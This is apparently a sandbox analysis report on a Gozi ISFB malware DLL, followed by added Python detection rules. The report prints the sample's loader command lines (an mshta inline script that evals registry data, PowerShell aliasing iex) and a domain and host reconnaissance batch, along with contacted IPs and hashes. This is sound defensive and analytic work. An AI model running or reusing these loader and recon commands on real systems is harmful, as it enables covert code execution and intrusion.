Analysis Overview
SHA256
982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Threat Level: Known bad
The file 62ea3f935563b.dll was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi ISFB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Gathers system information
Discovers systems in the same network
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 09:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 09:30
Reported
2022-08-03 09:32
Platform
win7-20220715-en
Max time kernel
41s
Max time network
44s
Command Line
Signatures
Gozi, Gozi ISFB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1064 wrote to memory of 1660 (7 WriteProcessMemory events) | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Note: a 64-bit regsvr32.exe handed a 32-bit DLL re-launches its SysWOW64 copy, so this parent/child pair is expected on its own; the signature is only meaningful together with the family match above.
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
Network
Files
memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp
memory/1660-55-0x0000000000000000-mapping.dmp
memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp
memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1660-63-0x0000000000190000-0x000000000019D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 09:30
Reported
2022-08-03 09:32
Platform
win10v2004-20220721-en
Max time kernel
151s
Max time network
126s
Command Line
Signatures
Gozi, Gozi ISFB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3176 set thread context of 2308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2308 set thread context of 3412 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 3720 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 1676 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 3972 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2308 set thread context of 4872 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseWorkingSetPrivilege (reported as LUID 33) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTimeZonePrivilege (reported as LUID 34) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreateSymbolicLinkPrivilege (reported as LUID 35) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDelegateSessionUserImpersonatePrivilege (reported as LUID 36) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseWorkingSetPrivilege (reported as LUID 33) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTimeZonePrivilege (reported as LUID 34) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreateSymbolicLinkPrivilege (reported as LUID 35) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDelegateSessionUserImpersonatePrivilege (reported as LUID 36) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Oeh7='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oeh7).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xbxdiov -value gp; new-alias -name ivvusty -value iex; ivvusty ([System.Text.Encoding]::ASCII.GetString((xbxdiov "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5043.tmp" "c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES513D.tmp" "c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5402.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5402.bin1 > C:\Users\Admin\AppData\Local\Temp\5402.bin & del C:\Users\Admin\AppData\Local\Temp\5402.bin1"
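Detection logic for the chain listed above, as an added example that is not part of the sandbox report or of the malware. It runs two checks over constructed process-creation events whose command lines are copied from the process list; the PIDs, parent PIDs and parent/child pairing are assumptions for the example, not the report's real tree. The first check flags the LOLBin loader stages (regsvr32 /s on a DLL under Temp, mshta running an inline HTA that evals a value under HKCU\Software\AppDataLow, PowerShell aliasing gp/iex to execute another value from the same key). The second counts how many distinct discovery tools one parent redirects into a single output file, which is what the 5402.bin1 collection above looks like in a process-creation log.

```python
"""Loader-stage and recon-burst detection over constructed process events.

Added example; not part of the sandbox report. Command lines are copied
from the report; PIDs/parents are constructed and are not the real tree.
"""
import re
from collections import defaultdict

TEMP = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"
OUT = TEMP + "5402.bin1"
REG_GUID = "53818B71-9696-FD5C-3837-2A81EC5BFE45"

MSHTA_CMD = ('"C:\\Windows\\System32\\mshta.exe" "about:<hta:application><script>'
             "Oeh7='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Oeh7)"
             ".regread('HKCU\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\"
             + REG_GUID + "\\\\SystemText'));if(!window.flag)close()</script>\"")
PS_CMD = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
          "new-alias -name xbxdiov -value gp; new-alias -name ivvusty -value iex; "
          "ivvusty ([System.Text.Encoding]::ASCII.GetString((xbxdiov "
          '"HKCU:Software\\AppDataLow\\Software\\Microsoft\\' + REG_GUID + '").StopName))')
RECON_CMDS = [
    'cmd /C "wmic computersystem get domain |more > ' + OUT + '"',
    'cmd /C "echo -------- >> ' + OUT + '"',
    'cmd /C "systeminfo.exe > ' + OUT + '"',
    'cmd /C "net view >> ' + OUT + '"',
    'cmd /C "nslookup 127.0.0.1 >> ' + OUT + '"',
    'cmd /C "tasklist.exe /SVC >> ' + OUT + '"',
    'cmd /C "driverquery.exe >> ' + OUT + '"',
    'cmd /C "reg.exe query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s >> ' + OUT + '"',
    'cmd /C "net config workstation >> ' + OUT + '"',
    'cmd /C "nltest /domain_trusts >> ' + OUT + '"',
    'cmd /C "nltest /domain_trusts /all_trusts >> ' + OUT + '"',
    'cmd /C "net view /all /domain >> ' + OUT + '"',
    'cmd /C "net view /all >> ' + OUT + '"',
    'cmd /U /C "type ' + OUT + ' > ' + TEMP + '5402.bin & del ' + OUT + '"',
]

# Constructed events: (pid, ppid, image, command line). PIDs/parents are assumptions.
EVENTS = [
    (4460, 2308, "C:\\Windows\\system32\\regsvr32.exe", "regsvr32 /s " + TEMP + "62ea3f935563b.dll"),
    (2732, 4460, "C:\\Windows\\SysWOW64\\regsvr32.exe", "/s " + TEMP + "62ea3f935563b.dll"),
    (1900, 2308, "C:\\Windows\\System32\\mshta.exe", MSHTA_CMD),
    (3176, 1900, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", PS_CMD),
    (4872, 2308, "C:\\Windows\\syswow64\\cmd.exe", '"C:\\Windows\\syswow64\\cmd.exe" /C pause dll mail, ,'),
] + [(5000 + i, 2308, "C:\\Windows\\system32\\cmd.exe", c) for i, c in enumerate(RECON_CMDS)]

# (rule name, image regex, command-line regex)
LOADER_RULES = [
    ("regsvr32_silent_temp_dll", r"regsvr32\.exe$",
     r"(?i)(?:^|\s)/s\s.*\\AppData\\Local\\Temp\\\S+\.dll"),
    ("mshta_inline_hta_regread", r"mshta\.exe$",
     r"(?i)about:<hta:application>.*regread\(.*AppDataLow"),
    ("powershell_aliased_iex_from_registry", r"powershell\.exe$",
     r"(?i)new-alias\s+-name\s+\S+\s+-value\s+(?:iex|gp)\b.*AppDataLow"),
]

RECON_TOOLS = {"systeminfo", "net", "nslookup", "tasklist", "driverquery",
               "reg", "nltest", "wmic", "whoami", "ipconfig", "arp", "route"}
CMD_RE = re.compile(r'^(?:"[^"]*\\)?cmd(?:\.exe)?"?\s+(?:/U\s+)?/C\s+"?(.*?)"?\s*$', re.I)


def loader_hits(events):
    """Return (pid, rule) for every event matching a loader-stage rule."""
    hits = []
    for pid, _, image, cmd in events:
        for name, image_re, cmd_re in LOADER_RULES:
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmd):
                hits.append((pid, name))
    return hits


def parse_recon(cmdline):
    """Split `cmd /C "<tool> args > file"` into (tool, redirect target); None if not cmd /C."""
    m = CMD_RE.match(cmdline)
    if not m:
        return None
    parts = m.group(1).split()
    if not parts:
        return None
    tool = parts[0].rsplit("\\", 1)[-1].lower()
    tool = tool[:-4] if tool.endswith(".exe") else tool
    redirect = re.search(r'>+\s*([^&"|]+)', m.group(1))  # covers both > and >>
    return tool, (redirect.group(1).strip() if redirect else None)


def recon_bursts(events, threshold=5):
    """Parents that drive >= threshold distinct discovery tools into one output file."""
    seen = defaultdict(set)  # (ppid, target file) -> tools used
    for _, ppid, image, cmd in events:
        if not image.lower().endswith("\\cmd.exe"):
            continue
        parsed = parse_recon(cmd)
        if parsed and parsed[0] in RECON_TOOLS and parsed[1]:
            seen[(ppid, parsed[1].lower())].add(parsed[0])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    for hit in loader_hits(EVENTS):
        print("loader:", hit)
    for (ppid, target), tools in recon_bursts(EVENTS).items():
        print(f"recon burst: parent {ppid} -> {target}: {tools}")
```

The burst check keys on the parent and the redirect target rather than on any single tool, so it still fires when the operator swaps individual commands; the closing `cmd /U /C "type ... > 5402.bin"` is not counted (it is a rename, and `/U` only makes cmd's internal commands write the copy as UTF-16).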
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| FR | 2.18.109.224:443 | | tcp |
| US | 104.208.16.88:443 | | tcp |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| BE | 8.238.110.126:80 | | tcp |
| BE | 8.238.110.126:80 | | tcp |
| BE | 8.238.110.126:80 | | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/2732-130-0x0000000000000000-mapping.dmp
memory/2732-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/2732-136-0x00000000013D0000-0x00000000013DD000-memory.dmp
memory/3176-140-0x0000000000000000-mapping.dmp
memory/3176-141-0x00000184D1AC0000-0x00000184D1AE2000-memory.dmp
memory/3176-142-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp
memory/1900-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.cmdline
| MD5 | a8718937ef61364b1ff01a0f558f88fb |
| SHA1 | b10850b439ae43950469eddf2d2e44b9d04bd2fb |
| SHA256 | 57f89a996df4e7e44e7b2f31c3dcf1134b2d46f785bc63bf314940842f1aa2c0 |
| SHA512 | 0db3ea1e1c3b54537407321b02d64062a56faf40059e206ae4fb28df1c7b6c6234197bd05456642bb25e1d362d3b53a729c1c99d8366dd6c4da21040f54c29ea |
\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/3472-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP
| MD5 | 13c40549927ecb565a68080079adeedf |
| SHA1 | 97337504d2c448e0802c67fa34e4472f03a9011f |
| SHA256 | 7e20b13cb6ba9ed1312daf7a2548741712dcf54fe72ccbaa751ab1d1991761bf |
| SHA512 | 972e4cbb137a1969dc3fc4cf22c65c43cbfc6f1cfccc5875953d35a02bfa321c7a345a8f639e2727350db6c96428238619ad089ca0f28137dc9eefa9cff16b3d |
C:\Users\Admin\AppData\Local\Temp\RES5043.tmp
| MD5 | 4a122eee466af995b7a1d8924beffb42 |
| SHA1 | b10f5efaa7f55d317a8614fdee1c57fde080805c |
| SHA256 | b9f61a5ff377549992dac2f1b55ff75626b8661ac0e16b9324ab020baffef3b7 |
| SHA512 | df0542d6cefa9ad1a23aef27c6738249fc0390dd8ae8ccca71d62b660ba4693130535774647606f32cef1c131c7b95a41f056addff6cac6a1e9f553f60ae4aa9 |
C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.dll
| MD5 | 75aa4748f3e6e6d709b8b1bbce3e58d6 |
| SHA1 | b1a9cb016fd7dcbabb8426cd58fa383b3498c254 |
| SHA256 | a5fd7722a679294932263c268a88db7008c6df49dd6a4f1677c358be6f268deb |
| SHA512 | 23300e7f347a6c94b7a6f5103e0d46b1498e4a478b9be3537108e5b88dea48471fc5193584d3b28f2dcc025cbda6d0627ffd5bf60135d232ab4b545c2aa9da99 |
memory/3756-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline
| MD5 | 2398ccec5a25485d6042481ef7559a3a |
| SHA1 | 71e68ee684d643f355e65433ad2acf2f6f242863 |
| SHA256 | 3af15a6c0999fe9ba0bc6ddd67dee3bc0c1003a0b71c3eb94c6c2d1ac8db90fd |
| SHA512 | ab5e61cdfef3e622e35fa6bb4ef07bcb437471f692749649a817cbd9f4b3aa89402f629c86b160544febef3f8226b46ede35d571d152c0ef390cef504b0a30ba |
\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/2496-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP
| MD5 | f8fbea95306639b9adfe5d4913a163fc |
| SHA1 | 25cdc0c5839ca541de0f2024635d88d201143424 |
| SHA256 | 6817c040bcad74ce38c95cf8804e7fcb0083575c6db2825783e1c04fa9b1e91c |
| SHA512 | 51a31f52d1a368a40dfd06d528a3f55215439b2eec9dc2bf28d6ec0aee51cd3d02f6b8af82a83a0713aabf3e2a687517354fd4f5eda90d0ba9b1c8d0725f05fc |
C:\Users\Admin\AppData\Local\Temp\RES513D.tmp
| MD5 | ca6364963d0e10b3f9430f798562d089 |
| SHA1 | 8096e5a8e3c65cf7c178204ea92f3d66ac16babd |
| SHA256 | 0e2177f33b076c4d61909766d71cf6ffa6080c42a25cd5198c86be36976936fe |
| SHA512 | 156ef898d22de0c4a90cfc4d48332e7328e53603d52d669c731b7f904acf6f0bbdb19a97a37b1c99c7ad015c27420fc26075cca6e1598e976d07dd7370ca8f4c |
C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.dll
| MD5 | 7380ea8a6308480b56661d8171a72f38 |
| SHA1 | 2acc510489147a6cbd8b7b99c983ed016d4319d2 |
| SHA256 | a35454500dbfacdb763ae98d06cc202efcfb6b14551c430054ad40949d9a8a99 |
| SHA512 | 1e35e97de56938fb78035de57aa6b5e6ae1da30f2e3871f59286c48f1d349c072c0e9ff162823f81064f2b6d78a3e0ea5a1fd4832e3c239e416e18086fc5eb76 |
memory/3176-157-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp
memory/3176-158-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp
memory/3176-159-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp
memory/3412-160-0x0000012777C80000-0x0000012777D23000-memory.dmp
memory/4872-163-0x0000000000000000-mapping.dmp
memory/3720-162-0x000001842F290000-0x000001842F333000-memory.dmp
memory/2308-164-0x00000000092E0000-0x0000000009383000-memory.dmp
memory/4856-161-0x0000000000000000-mapping.dmp
memory/1676-165-0x00000216AE550000-0x00000216AE5F3000-memory.dmp
memory/4600-167-0x0000000000000000-mapping.dmp
memory/3972-166-0x00000290C22E0000-0x00000290C2383000-memory.dmp
memory/2928-168-0x0000000000000000-mapping.dmp
memory/4872-169-0x0000000000126B20-0x0000000000126B24-memory.dmp
memory/4872-170-0x0000000001600000-0x0000000001696000-memory.dmp
memory/2016-171-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5402.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/3696-173-0x0000000000000000-mapping.dmp
memory/2308-174-0x000000000B670000-0x000000000B7AB000-memory.dmp
